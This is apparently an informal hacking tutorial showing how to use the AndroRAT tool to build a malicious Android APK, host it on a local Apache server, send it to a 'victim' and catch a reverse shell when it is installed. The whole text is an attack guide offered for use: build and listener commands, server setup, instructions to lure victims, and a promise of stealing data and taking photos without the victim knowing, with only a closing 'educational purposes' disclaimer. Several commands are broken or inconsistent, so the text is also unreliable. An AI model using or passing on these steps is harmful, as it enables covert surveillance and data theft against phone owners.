How to hack gain control of any mobile device using a apk with malicious code
$ things you need::
1.Any terminal eg(termux,parrot os,kali)
2. Internet connection
$ Now let's hà ck::
> go to your terminal and run this command:: git clone (tap to copy)✌
> after you've run that run this one next:
cd AndroRAT/ (tap to copy) then run this :: ls to list the contents of the directory
> you will see requirements.txt so it has dependencies we need to ensure the command works so run this simple command :: pip install -r requirements.txt (tap to copy)
"It will install dependencies"....
> Now it's time to create a malicious apk 😈
> run this command:
python3 --build -i -p 4444 -o vertualfreenet.apk (tap to copy) remove vertualfreenet.apk and name the apk whatever you want 😉
📢: the -i stands for IP address were using i chose cuz that's the IP address of my termux machine if you're using kali or parrot os run this command
> ifconfig (tap to copy) it will show ip address of your terminal pls termux users check your ip address using this command so you ensure the address you're using is of your own machine
Moving on.....
Run this:: ls -lt (tap to copy) with this command it'll show you the apk you just created , simple
Now let's host a listener so we know if someone install your apk
> run this command to host::
python3 --shell -1 -p 4444 (tap to copy)
"Now it will wait for connections"
Now jump into a second session by sliding on the left side of your termux then you'll see new session tap that
>on that new session run this command:: sudo systemctl status apache2.service (tap to copy) this command will start a service for you "FOR FREE"🥳
> let's start our server shall we:
sudo systemctl start apache2.service (tap to copy) this command will start your server
>run this command:: cd AndroRAT/ (tap to copy)
>run this command:: sudo cp tanexdigitech.apk var/www/html (tap to copy) this will copy and paste your malicious apk in the server You just started "change vertualfreenet.apk to the name of your malicious apk if you haven't idiot"
Now send this to your victim::
> (tap to copy) "change name of my apk to yours"
Now if the victim installed your apk , swipe on the left side of your termux and go back to the first session we did...the one we exited will tell you "hello welcome to reverse shell of androRAT"
That's it we're in😈
Now type in this::
help (tap to copy)
The help will show you how to steal info from the victims take pictures of them without knowing steal info from their phone etc....
Disclaimer:: This information is for educational purposes only I do not encourage any misuse of this knowledge only use this Info on yourself or if you gain permission to use it on someone